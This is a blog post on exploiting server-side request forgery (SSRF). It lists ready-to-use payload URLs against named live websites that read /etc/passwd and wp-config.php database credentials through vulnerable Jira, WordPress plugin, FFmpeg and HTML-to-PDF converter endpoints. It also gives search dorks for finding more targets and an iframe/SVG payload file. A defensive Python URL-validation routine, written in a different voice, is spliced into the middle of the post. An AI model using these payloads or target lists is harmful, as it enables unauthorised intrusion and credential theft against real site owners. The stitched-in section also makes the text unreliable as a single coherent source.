SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-3

SaN ThosH
3 min read · Jan 27, 2019


Let's get into live examples.

The author of this blog is in no way responsible for any misuse of the information.

4. Live Examples -

Let's look into a basic SSRF.

https://robert-brook.com/parliament/index.php?page=http://www.parliament.uk/business/news/2019/parliamentary-news-2019/this-week-in-the-commons-friday-25-january-2019/

Here the page parameter fetches an external resource and displays its content.

SSRF to XSS -

https://robert-brook.com/parliament/index.php?page=http://brutelogic.com.br/poc.svg

Read Local files -

https://robert-brook.com/parliament/index.php?page=file:///etc/passwd

Trying other URL schemes such as dict:// gives an error:

 Warning: file_get_contents(): Unable to find the wrapper "dict" - did you forget to enable it when you configured PHP

This indicates that the dict:// URL scheme is not enabled.

In the same way you can try other URL schemes, find which ones are enabled, and use them to exploit it further.

SSRF in FFMPEG -

Read local files

Working vulnerable sites -

https://www.onlinevideoconverter.com/
https://www.files-conversion.com/

Repo Link - https://github.com/neex/ffmpeg-avi-m3u-xbin

SSRF in Widely used Plugins and CMS -

SSRF in Jira -

Jira versions below 7.3.5 are vulnerable to SSRF.

https://<JIRA_BASEPATH>/plugins/servlet/oauth/users/icon-uri?consumerUri=…

There are more than 40k Jira sites on Shodan. You can find them using the dorks below:

X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com" -- For aws
X-AUSERNAME: anonymous org:"Microsoft Azure" -- For Azure
X-AUSERNAME: anonymous org:"google" -- For Google

Now let's see some vulnerable sites.


These are some vulnerable sites I found.

SSRF in JSmol2WP Wordpress Plugin -

JSmol2WP versions below 1.07 have an unauthenticated Server Side Request Forgery.

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

Dork -

inurl:wp-content/plugins/jsmol2wp

Vulnerable sites -

https://www.vivelab12.fr/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details
http://thasso.com/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=https://google.com -- Fetch google.com
http://www.ch.ic.ac.uk/rzepa/blog/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php -- DB details
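Every case so far has the same root cause: the page parameter in the basic example, Jira's consumerUri and the JSmol2WP query parameter hand an attacker-chosen URL straight to the server's fetcher, which is why file://, dict://, php://filter and cloud metadata addresses all work. As an added example (not code from the post or from any of these projects), here is the kind of allow-list guard a defender puts in front of such a fetch, in Python; the hostnames and addresses used in the test inputs are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# A "fetch this page" feature only ever needs plain web fetches;
# file://, dict://, php://filter, gopher:// and friends are never legitimate.
ALLOWED_SCHEMES = {"http", "https"}


def is_blocked_ip(ip_text):
    """True for loopback, RFC 1918, link-local (which includes 169.254.169.254,
    the cloud instance-metadata address), multicast, reserved and unspecified."""
    addr = ipaddress.ip_address(ip_text)
    # http://[::ffff:169.254.169.254]/ would slip past an IPv4-only check,
    # so unwrap IPv4-mapped IPv6 addresses before classifying them.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_outbound_url(url, resolver=socket.getaddrinfo):
    """Return (True, [addresses]) if the URL may be fetched, else (False, reason).

    `resolver` is injectable so the check can be run offline in tests; it must
    return getaddrinfo()-shaped tuples. The caller should connect to one of the
    returned addresses instead of re-resolving the hostname, otherwise a
    DNS-rebinding attacker can pass this check and then change the record.
    """
    parts = urlsplit(url)                      # urlsplit lowercases the scheme
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:       # reject http://user@host/ tricks
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
        infos = resolver(parts.hostname, port)
    except (socket.gaierror, ValueError) as exc:
        return False, f"resolution failed: {exc}"
    addresses = sorted({info[4][0] for info in infos})
    for address in addresses:
        if is_blocked_ip(address):
            return False, f"{parts.hostname} resolves to blocked address {address}"
    return True, addresses
```

Logging the rejected reason is worth doing: repeated rejections for file://, php:// or metadata addresses on one endpoint are a clear signal that someone is probing it.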

SSRF in Qards Wordpress Plugin -

Qards is vulnerable to Server Side Request Forgery (SSRF)

http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com

Dork -

inurl:wp-content/plugins/qards

Vulnerable sites -

http://www.horlovia-chemicals.ch/wordpress/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://vfsgroup.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://mrgoatygelato.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://arturolopezvalerio.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://hooverwellness.com/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com

SSRF in HTML to PDF conversion -

Vulnerable sites -

https://pdfcrowd.com/#convert_by_input
https://convertio.co/html-pdf/

Content of Ssrf.html:

"><iframe src="file:///etc/passwd"></iframe>"><svg/onload=document.write(document.location)>

-- to learn the path and sometimes to learn what OS they are using on the backend

All these sites posted above are just to let you practice; I am not responsible for any misuse of the information.
